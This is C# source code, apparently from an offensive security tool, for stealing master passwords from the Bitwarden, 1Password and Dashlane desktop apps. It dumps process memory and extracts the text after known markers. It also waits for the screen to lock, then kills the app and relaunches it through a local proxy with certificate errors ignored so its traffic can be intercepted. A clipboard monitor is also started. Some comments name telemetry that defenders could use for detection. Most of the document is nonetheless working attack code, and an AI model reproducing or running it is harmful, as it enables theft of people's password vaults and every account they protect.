/// <summary>
/// Scans the memory of every running Bitwarden desktop process for a token marker
/// and prints the text that follows the first hit.
/// </summary>
/// <remarks>
/// The memory read itself happens in MemoryHelper.dumpProcessMemory, which is not shown here.
/// Defender view: the observable is one user-mode process reading the memory of a
/// password-manager process. Process-access telemetry (for example Sysmon Event ID 10,
/// ProcessAccess) with the password manager as the target is the place to alert on this.
/// </remarks>
public static void dumpBitwardenMaster()
{
    // Marker searched for in the dump; the method prints what follows it.
    const string indicator = "\"amr\":[\"Application\"]}";
    // Number of characters examined starting at the marker.
    const int windowLength = 100;

    Process[] candidates = Process.GetProcessesByName("BiTWarDen");
    Console.WriteLine("[DEBUG] Number of Processes Found: {0}", candidates.Length);

    for (int i = 0; i < candidates.Length; i++)
    {
        Process target = candidates[i];
        DebugFunctions.writeDebug(
            String.Format("Enumerating Process: {0} - {1}", target.Id, target.ProcessName),
            Globals.DebugMode);

        string dump = MemoryHelper.dumpProcessMemory(target);

        if (!dump.Contains(indicator))
        {
            Console.WriteLine("[-] Unable to locate Master Password in this process.");
            continue;
        }

        DebugFunctions.writeDebug("Found String Indicator, attempting to pull password", Globals.DebugMode);

        int markerIndex = dump.IndexOf(indicator, 0);
        string window = dump.Substring(markerIndex, windowLength);

        // The window is split on NUL and the second field is reported.
        string[] fields = window.Split('\0');
        Console.WriteLine("[SUCCESS] Potential Bitwarden Password Location found! {0}", fields[1]);
        return;
    }

    Console.WriteLine("[-] Unable to locate Master Password in any process.");
}
/// <summary>
/// Terminates every running 1Password process and starts the executable again with
/// command-line switches that route it through a local proxy and disable certificate checks.
/// </summary>
/// <param name="force">
/// When false, the method first blocks until the workstation-lock monitor reports a lock.
/// When true, it restarts the application immediately.
/// </param>
/// <remarks>
/// Defender view: the relaunch is visible in process-creation logging as a password-manager
/// binary started with <c>--proxy-server=</c> and <c>--ignore-certificate-errors</c>.
/// Neither switch belongs on a credential-handling application in normal use, so the
/// command line is a high-signal detection point.
/// </remarks>
public static void LaunchWithProxy(bool force)
{
    // Known limitation (from the original author): this only reacts to a lock-change
    // notification; it does not determine whether the screen is currently locked.
    if (!force)
    {
        DebugFunctions.writeDebug("Waiting for Screen to lock before bouncing application", Globals.DebugMode);

        var lockWatcher = new Monitoring.CheckForWorkstationLocking();
        lockWatcher.Run();
        Console.WriteLine("Press ESC to exit...");

        // Poll the watcher's flag every ten seconds.
        while (!lockWatcher.screenLocked)
        {
            System.Threading.Thread.Sleep(10000);
        }

        DebugFunctions.writeDebug("Screen lock notification recieved, continuing.", Globals.DebugMode);
    }

    Process[] running = Process.GetProcessesByName("1Password");
    if (running.Length < 1)
    {
        DebugFunctions.writeDebug("No Processes found", Globals.DebugMode);
    }

    string executablePath = "";
    for (int i = 0; i < running.Length; i++)
    {
        Process instance = running[i];

        // Remember the image path of the first instance before it is terminated.
        if (executablePath.Length == 0)
        {
            executablePath = instance.MainModule.FileName;
            DebugFunctions.writeDebug("Getting Process Path: " + executablePath, Globals.DebugMode);
        }

        // Every running instance is killed so the relaunch is the only one left.
        instance.Kill();
    }

    DebugFunctions.writeDebug("Starting Process with New Arguments", Globals.DebugMode);

    var relaunched = new Process
    {
        StartInfo =
        {
            FileName = executablePath,
            Arguments = "--proxy-server=http://127.0.0.1:8888 --ignore-certificate-errors"
        }
    };
    relaunched.Start();
}
/// <summary>
/// Dumps the memory of each running Dashlane process, cleans the text, and prints every
/// regular-expression match together with its offset.
/// </summary>
/// <remarks>
/// MemoryHelper.dumpProcessMemory and DebugFunctions.ReturnCleanASCII are defined elsewhere.
/// The method waits for a key press after each process.
/// Defender view: as with the other dump routines, the observable is a cross-process memory
/// read that targets a password-manager process.
/// </remarks>
public static void dumpDashlaneMaster()
{
    // Pattern applied to the cleaned dump. An earlier variant anchored on "receiveNotif".
    const string pattern = @"\s{3}(.+)\0{3}";

    Process[] candidates = Process.GetProcessesByName("dashlane");
    Console.WriteLine("[DEBUG] Number of Processes Found: {0}", candidates.Length);

    foreach (Process target in candidates)
    {
        DebugFunctions.writeDebug(
            String.Format("Enumerating Process: {0} - {1}", target.Id, target.ProcessName),
            Globals.DebugMode);
        DebugFunctions.writeDebug("Dumping Memory", Globals.DebugMode);

        // NUL bytes are stripped before the text is passed to the ASCII cleaner.
        string rawDump = MemoryHelper.dumpProcessMemory(target);
        string withoutNuls = rawDump.Replace("\0", string.Empty);
        string cleaned = DebugFunctions.ReturnCleanASCII(withoutNuls);

        DebugFunctions.writeDebug("Parsing Memory Dump. Warning this could take a while.", Globals.DebugMode);

        MatchCollection hits = Regex.Matches(cleaned, pattern);
        foreach (Match hit in hits)
        {
            Console.WriteLine(
                "[DEBUG] '{0}' found at index {1}",
                DebugFunctions.ReturnCleanASCII(hit.Value),
                hit.Index);
        }

        DebugFunctions.writeDebug("Finished", Globals.DebugMode);
        Console.ReadKey();
    }
}
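/// <summary>
/// Placeholder for the Dashlane entry-dump feature. It reports that the feature is not
/// implemented and returns without touching any process.
/// </summary>
/// <remarks>
/// The previous body kept a draft implementation after an unconditional <c>return</c>.
/// That code could never execute (compiler warning CS0162) and has been removed so the
/// method's real behaviour is clear from reading it.
/// </remarks>
public static void dumpDashLanePasswords()
{
    Console.WriteLine("[!] Not Fully Implemented Yet!");
}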
// Author's note on a separate idea that this method does not implement: set
//   "security": { "concealPasswords": false }
// in the 1Password configuration, then read memory for the revealed entries.

/// <summary>
/// Dumps the memory of each running 1Password process and prints the text found between
/// known marker strings. A JSON field marker is tried first, then a plain-text fallback.
/// </summary>
/// <remarks>
/// The dump comes from MemoryHelper.dumpProcessMemory, which is defined elsewhere. A
/// commented-out predecessor in the original source opened the process with
/// query-information and VM-read access, walked committed read/write regions with
/// VirtualQueryEx, and copied them with ReadProcessMemory into a dump file. The helper
/// presumably does the same, but that is not visible from this method.
/// Defender view: handle requests with VM-read access against a password-manager process
/// from an unrelated binary are the telemetry to watch (for example Sysmon Event ID 10).
/// The method returns after the first process that yields a hit.
/// </remarks>
public static void dump1passwordMaster()
{
    const string jsonStartMarker = "{\"name\":\"master-password\",\"value\":\"";
    const string jsonEndMarker = ",\"type\":\"P\",\"designation\":\"password\"},{\"name\":\"account-key\"";
    const string textStartMarker = "on 1password.com.<LF>";
    const string textEndMarker = "<LF>secret key<LF>";

    Process[] candidates = Process.GetProcessesByName("1Password");
    Console.WriteLine("[DEBUG] Number of Processes Found: {0}", candidates.Length);

    foreach (Process target in candidates)
    {
        DebugFunctions.writeDebug(
            String.Format("Enumerating Process: {0} - {1}", target.Id, target.ProcessName),
            Globals.DebugMode);

        // Line feeds become a visible "<LF>" token (kept by the author to help rule out
        // false positives in the output) and NUL bytes are removed.
        string dump = MemoryHelper.dumpProcessMemory(target)
            .Replace("\n", "<LF>")
            .Replace("\0", String.Empty);

        if (dump.Contains(jsonStartMarker))
        {
            DebugFunctions.writeDebug("Found JSON Indicator, attempting to pull password", Globals.DebugMode);

            int from = dump.IndexOf(jsonStartMarker, 0) + 35;
            int to = dump.IndexOf(jsonEndMarker, 0) - 1;
            Console.WriteLine(
                "[+] Potential 1Password Password Location found: {0}",
                dump.Substring(from, to - from));
            return;
        }

        if (dump.Contains(textStartMarker))
        {
            DebugFunctions.writeDebug("First pass through didn't find anything, testing backup", Globals.DebugMode);

            int from = dump.IndexOf(textStartMarker, 0) + 20;
            int to = dump.IndexOf(textEndMarker);
            Console.WriteLine(
                "[+] Potential 1Password Password Location found: {0}",
                dump.Substring(from, to - from));
            return;
        }

        Console.WriteLine("[-] Unable to locate Master Password :(");
        Console.ReadKey();

        Console.WriteLine("Fin. Press any key to exit");
        Console.ReadKey();
    }
}
/// <summary>
/// Command-line entry point. Parses the options and dispatches to the clipboard monitor,
/// the proxy-relaunch routine, or a per-manager memory-dump routine.
/// </summary>
/// <param name="args">Raw command-line arguments, bound to <c>MyArgs</c> by <c>Args.Parse</c>.</param>
/// <remarks>
/// Option precedence is Proxy, then GetMaster, then Dump. Debug, Monitor and Local are
/// handled first and do not stop the later dispatch.
/// </remarks>
static void Main(string[] args)
{
    var options = Args.Parse<MyArgs>(args);

    if (options.Debug)
    {
        Globals.DebugMode = true;
        Console.WriteLine("[DEBUG] Debug mode enabled. Outputting debug messages");
    }

    if (options.Monitor)
    {
        Console.WriteLine("[+] Starting Clipboard Monitor");
        Monitoring.Start();
    }

    // Intended to process a memory dump taken on the local machine; not implemented.
    if (options.Local)
    {
        Console.WriteLine("[!] Not Implemented (yet)");
    }

    if (options.Proxy)
    {
        string[] proxyCapable = { "bitwarden", "1password" };

        if (String.IsNullOrEmpty(options.Manager))
        {
            Console.WriteLine("[!] Please specify a password manager with the -Manager flag!");
            return;
        }

        // Substring test: the supplied name only has to contain a supported name.
        string requested = options.Manager.ToString().ToLower();
        bool recognised = proxyCapable.Any(name => requested.Contains(name));
        if (!recognised)
        {
            Console.WriteLine("[!] Sorry, that password manager is not yet supported");
            return;
        }

        var proxyThread = new Thread(() =>
        {
            Thread.CurrentThread.IsBackground = true;
            DebugFunctions.writeDebug("Starting Proxy. Press any key to quit.", Globals.DebugMode);
            ProxyHelper.startProxy();
        });
        proxyThread.Start();

        // Exact match here, so a name that only passed the substring test launches nothing.
        switch (options.Manager.ToLower())
        {
            case "bitwarden":
                BitWarden.LaunchWithProxy(options.Force);
                break;
            case "1password":
                _1Password.LaunchWithProxy(options.Force);
                break;
        }

        Console.ReadKey();
        DebugFunctions.writeDebug("Stopping Proxy.", Globals.DebugMode);
        ProxyHelper.DoQuit();
        DebugFunctions.writeDebug("Proxy stopped, Press any key to exit.", Globals.DebugMode);
        Console.ReadKey();
        return;
    }

    if (options.GetMaster)
    {
        // NOTE(review): Manager is dereferenced here without the null/empty check that the
        // Proxy and Dump paths perform.
        switch (options.Manager.ToLower())
        {
            case "bitwarden":
                Console.WriteLine("[+] Checking for Bitwarden Executables.");
                BitWarden.dumpBitwardenMaster();
                Console.ReadKey();
                break;
            case "1password":
                Console.WriteLine("[+] Checking for 1Password Executables.");
                _1Password.dump1passwordMaster();
                break;
            case "keepass":
                Console.WriteLine("[-] Not currently implemented for KeePass, but checked out HarmJ0y's KeeThief located at https://github.com/HarmJ0y/KeeThief");
                break;
            case "dashlane":
                Dashlane.dumpDashlaneMaster();
                break;
            default:
                Console.WriteLine("[-] Password manager not currently supported!");
                break;
        }
        return;
    }

    if (options.Dump)
    {
        if (String.IsNullOrEmpty(options.Manager))
        {
            Console.WriteLine("[!] Please specify a password manager with the -Manager flag!");
            return;
        }

        // Every manager value, including "bitwarden", produces the same message.
        Console.WriteLine("[!] This functionality is not yet supported!");
        return;
    }

    Console.WriteLine("[!] No Options Selected");
}